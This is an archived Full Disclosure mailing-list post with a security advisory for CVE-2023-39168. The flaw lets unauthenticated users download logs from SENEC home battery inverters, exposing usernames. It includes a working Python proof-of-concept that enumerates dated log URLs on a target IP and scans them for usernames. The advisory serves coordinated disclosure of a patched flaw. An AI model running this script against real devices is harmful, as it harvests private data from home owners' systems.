[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] Senec Inverters Home V1, V2, V3 Home & Hybrid Exposure of the Username to an Unauthorized Actor - CVE-2023-39168

To: "fulldisclosure@xxxxxxxxxxxx" <fulldisclosure@xxxxxxxxxxxx>
Subject: [FD] Senec Inverters Home V1, V2, V3 Home & Hybrid Exposure of the Username to an Unauthorized Actor - CVE-2023-39168
From: Phos4Me via Fulldisclosure <fulldisclosure@xxxxxxxxxxxx>
Date: Fri, 10 Nov 2023 07:12:01 +0000

> > Advisory ID: Ph0s-2023-002
> > Product: EnBw - SENEC legacy storage box: V1-V3
> > Manufacturer: SENEC - a part of EnBw
> > Affected Version(s): Firmware: all (as of 2023-06-19)
> > Tested Version(s): current
> > Vulnerability Type: CWE-200: Exposure of Sensitive Information to an
> > Unauthorized Actor
> > 

> > Risk Level: CVSS v3.1 Vector:
> > AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N (7.5 High)
> > 

> > Manufacturer Risk Level Rating:
> > AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:H/RL:T/RC:C
> > Overall CVSS Score: 7.2
> > 

> > Solution Status: Fixed
> > Manufacturer Notification: 2023-06-05
> > Public Disclosure: 2023-11-01
> > CVE Reference: CVE-2023-39168
> > Author of Advisory: Ph0s[4], R0ckE7
> > 

> > ********************************************************************************
> > 

> > Overview:
> > Foreword:
> > This vulnerability was reported to the enbw-cert. we would like to
> > thank enbw-cert for taking care of the vulns and patch the systems.
> > we decided to publish when most of the reported vulns are patched
> > to make sure nobody is harmed when 3rdparys exploit the mentioned vulns.
> > 

> > About Senec:
> > We are SENEC
> > 

> > We have been the EnBW energy independence experts since 2018 – but we have
> > put our heart and soul into guiding customers on the route to independence
> > since SENEC was founded in 2009. Our passion lies in actively promoting the
> > energy transition with innovative ideas and pioneering products. And,
> > because we don’t do things by halves, our unwavering ambition is to create
> > integrated solutions that enable you to enjoy the highest possible degree
> > of independence and sustainability through self-generation of solar
> > electricity.
> > 

> > About SENEC Home:
> > 

> > SENEC.Home: The smart electricity storage device for your home
> > 

> > SENEC.Home is the heart of the your sustainable, affordable supply of solar
> > electricity. The smart battery storage device stores excess electricity
> > generated by your PV system so that you can use it when you need it – such 
> > as
> > when your household’s energy consumption rises in the evening, or on rainy 
> > days
> > when your PV system generates less power.
> > 

> > ********************************************************************************
> > 

> > Vulnerability Details:
> > 

> > As already stated in CVE-2023-39167, no authentication is required to 
> > access log
> > information. Therefore, and due to the predictable URL scheme, it is 
> > possible
> > for an attacker to download all existing log files to obtain the username.
> > 

> > ********************************************************************************
> > 

> > Proof of Concept (PoC):
> > 

> > The attack consists of the following steps:
> > 

> > 1. parse the script using this PoC Code to obtail the username:
> > import argparse
> > import datetime
> > import os
> > import requests
> > 

> > def get_senec_logs(senec_ip, day_range, break_on_username):
> > start_date = datetime.datetime.today()
> > end_date = start_date - datetime.timedelta(days=day_range)
> > delta = datetime.timedelta(days=1)
> > 

> > while end_date < start_date:
> > try:
> > senec_url = f"http://{senec_ip}/log/{start_date.strftime('%Y')}/" \
> > f"{start_date.strftime('%m')}/{start_date.strftime('%d')}.log"
> > r = requests.get(senec_url)
> > print(f"HTTP Status Code {r.status_code}: {senec_url}")
> > 

> > if r.status_code != 200: break
> > if r.headers["Content-Length"] == "0": break
> > 

> > os.makedirs(os.path.dirname(senec_url.replace("http://";, "")), 
> > exist_ok=True)
> > with open(senec_url.replace("http://";, ""), "wb") as senec_log_file:
> > senec_log_file.write(r.content)
> > offset = r.content.find(bytes("username:", "utf-8"))
> > if offset != -1:
> > print(f"Username found in {senec_log_file.name} at offset {offset}")
> > if break_on_username: break
> > except requests.ConnectionError:
> > print("Failed to connect to SENEC.Inverter")
> > break
> > except Exception as e:
> > print(f"An unhandled exception occurred:\n{e}")
> > break
> > start_date -= delta
> > 

> > if name == 'main':
> > parser = argparse.ArgumentParser(description="Download SENEC.Inverter log 
> > files")
> > parser.add_argument("ip", type=str, help="IP address of the target 
> > SENEC.Inverter")
> > parser.add_argument("-b", "--break-on-username", action="store_true", 
> > default=False, required=False,
> > help="stop downloading once a username is found")
> > parser.add_argument("-d", "--day-range", type=int, action="store", 
> > default=365 * 20, required=False,
> > help="number of days to download log files in reverse order starting today")
> > args = parser.parse_args()
> > get_senec_logs(args.ip, args.day_range, args.break_on_username)
> > 

> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > 

> > Solution:
> > Patched by Manufacturer
> > (Rolled out until September 11, 2023)
> > 

> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > 

> > Disclosure Timeline:
> > 

> > 2022-06-01: Vulnerability discovered
> > 2023-06-05: Vulnerability reported to manufacturer
> > 2023-09-11: Patch rollout by manufacturer to affected devices
> > 2023-11-01: Public disclosure of vulnerability
> > 

> > ************************************************************************
> > 

> > Researcher:
> > Ph0s[4], R0ckE7
> > 

> > ************************************************************************
> > 

> > Disclaimer:
> > 

> > The information provided in this security advisory is provided "as is"
> > and without warranty of any kind. Details of this security advisory may
> > be updated in order to provide as accurate information as possible.
> > 

> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > 

> > Copyright:
> > 

> > Creative Commons - Attribution (by) - Version 4.0
> > URL: https://creativecommons.org/licenses/by/4.0/deed.en
> > _______________________________________________
> > Sent through the Full Disclosure mailing list
> > https://nmap.org/mailman/listinfo/fulldisclosure
> > Web Archives & RSS: https://seclists.org/fulldisclosure/

Attachment: publickey - Phos4Me@proton.me - 0x3F4F673D.asc
Description: application/pgp-keys

Attachment: signature.asc
Description: OpenPGP digital signature

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Prev by Date: [FD] Senec Inverters Home V1, V2, V3 Home & Hybrid Cleartext Transmission of Authentication Credentials - CVE-2023-39172
Next by Date: [FD] [CVE-2023-46383, CVE-2023-46384, CVE-2023-46385] Multiple vulnerabilities in Loytec products (2)
Previous by thread: [FD] Senec Inverters Home V1, V2, V3 Home & Hybrid Cleartext Transmission of Authentication Credentials - CVE-2023-39172
Next by thread: [FD] [CVE-2023-46383, CVE-2023-46384, CVE-2023-46385] Multiple vulnerabilities in Loytec products (2)
Index(es):
- Date
- Thread